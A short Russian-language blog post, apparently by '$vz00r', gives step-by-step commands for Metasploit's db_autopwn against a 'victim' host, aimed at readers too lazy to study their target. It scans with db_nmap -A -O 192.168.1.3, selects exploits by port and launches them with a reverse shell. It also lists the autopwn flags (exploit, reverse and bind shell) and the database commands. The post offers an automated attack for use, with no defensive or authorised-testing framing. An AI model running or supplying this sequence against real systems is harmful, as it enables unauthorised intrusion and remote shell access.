Если вы не знаете какой эксплоит использовать или вам просто лень изучать жертву - то это для вас.
Короче, открываем консоль и набираем db_driver чтобы уточнить драйвер датабазы.


Так, базу создали, теперь засканируем жертву : db_nmap –A –O 192.168.1.3

Аргумент [–A] - запрашивает агрессивный скан [–O] определяет эксплуатационную систему.
Скан завершен, подбираем эксплоиты : db_autopwn –p –t

Ну вот и все, остается только скомандовать db_autopwn –p –t –e –r чтобы запустить процесс атаки.
Команда db_autopwn может иметь следующие флаги :
-t Выводит все возможные эксплоиты.
-x Выбор эксплоитов по их реферанс.
-p Выбор эксплоитов по портам .
-e Запускает эксплоит.
-r Использовать reverse connect shell.
-b Использовать bind shell.
-h Меню справки.
Команды для работы с вашей базой :
db_connecte – Соединиться с существующей базой.
db_create – Создать новую базу.
db_destroy – Удалить существующую базу.
db_disconnect – Выйти из базы.
db_driver – Уточнить драйвер базы.
$vz00r
Aucun commentaire:
Enregistrer un commentaire